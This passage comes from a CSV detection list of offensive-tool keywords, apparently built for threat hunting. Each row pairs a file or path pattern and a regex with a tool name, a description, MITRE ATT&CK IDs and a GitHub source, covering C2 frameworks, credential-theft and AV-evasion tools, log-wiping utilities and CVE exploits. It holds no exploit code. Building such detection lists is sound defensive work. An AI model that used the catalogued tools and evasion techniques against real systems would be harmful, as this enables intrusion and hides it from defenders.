Access","https://github.com/CCob/MirrorDump","1","1","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*/Misc/donut.exe*",".{0,1000}\/Misc\/donut\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*/mitmAP*",".{0,1000}\/mitmAP.{0,1000}","offensive_tool_keyword","mitmAP","A python program to create a fake AP and sniff data","T1563 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/xdavidhu/mitmAP","1","1","N/A","N/A","10","1645","272","2019-11-03T11:34:06Z","2016-10-22T21:49:25Z" "*/MITMRecorder.py*",".{0,1000}\/MITMRecorder\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to 
watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/mmouse-brute.nse*",".{0,1000}\/mmouse\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mmouse-exec.nse*",".{0,1000}\/mmouse\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mockingjay_BOF.git*",".{0,1000}\/Mockingjay_BOF\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*/modbus-discover.nse*",".{0,1000}\/modbus\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Models/PowerShellLauncher.*",".{0,1000}\/Models\/PowerShellLauncher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Models/Regsvr32Launcher.*",".{0,1000}\/Models\/Regsvr32Launcher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Models/ShellCodeLauncher.*",".{0,1000}\/Models\/ShellCodeLauncher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Modlishka.git*",".{0,1000}\/Modlishka\.git.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse 
proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*/module/darkexe/*",".{0,1000}\/module\/darkexe\/.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/Modules/Exitservice/uinit.exe*",".{0,1000}\/Modules\/Exitservice\/uinit\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/modules/kull_m_crypto_system.h*",".{0,1000}\/modules\/kull_m_crypto_system\.h.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*/modules/payload/*",".{0,1000}\/modules\/payload\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/momyshark.html*",".{0,1000}\/momyshark\.html.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*/mongodb-brute.nse*",".{0,1000}\/mongodb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mongodb-databases.nse*",".{0,1000}\/mongodb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mongodb-info.nse*",".{0,1000}\/mongodb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/monkey.py",".{0,1000}\/monkey\.py","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/monkey_island.py*",".{0,1000}\/monkey_island\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/MonkeyWorks.git*",".{0,1000}\/MonkeyWorks\.git.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*/moonwalk.git*",".{0,1000}\/moonwalk\.git.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem 
timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*/moonwalk_darwin*",".{0,1000}\/moonwalk_darwin.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*/Moriarty.exe*",".{0,1000}\/Moriarty\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/mortar.git*",".{0,1000}\/mortar\.git.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*/mortar/releases/download/v2/encryptor*",".{0,1000}\/mortar\/releases\/download\/v2\/encryptor.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*/mouselogger.py*",".{0,1000}\/mouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/mouselogger.py*",".{0,1000}\/mouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. 
OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/mqtt-subscribe.nse*",".{0,1000}\/mqtt\-subscribe\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mRemoteNG-Decrypt*",".{0,1000}\/mRemoteNG\-Decrypt.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","120","43","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" "*/mrinfo.nse*",".{0,1000}\/mrinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mr-Un1k0d3r/*",".{0,1000}\/Mr\-Un1k0d3r\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*/Mr-xn/cve-2022-23131*",".{0,1000}\/Mr\-xn\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","149","45","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" "*/MS15-034.nse*",".{0,1000}\/MS15\-034\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/ms17-010.py*",".{0,1000}\/ms17\-010\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/msf.go",".{0,1000}\/msf\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/msf.swf*",".{0,1000}\/msf\.swf.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/msfcrawler*",".{0,1000}\/msfcrawler.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/msfnonstaged.exe*",".{0,1000}\/msfnonstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/msfpc.sh*",".{0,1000}\/msfpc\.sh.{0,1000}","offensive_tool_keyword","msfpc","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","1","N/A","N/A","10","1176","267","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" "*/msfstaged.exe*",".{0,1000}\/msfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/msftest/*",".{0,1000}\/msftest\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/msfvenom/*",".{0,1000}\/msfvenom\/.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/msf-ws.log*",".{0,1000}\/msf\-ws\.log.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/MsgKitTestTool/*",".{0,1000}\/MsgKitTestTool\/.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","157","45","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" "*/Mshikaki.git*",".{0,1000}\/Mshikaki\.git.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "*/mshta.cmd*",".{0,1000}\/mshta\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/mshtajs.cmd*",".{0,1000}\/mshtajs\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 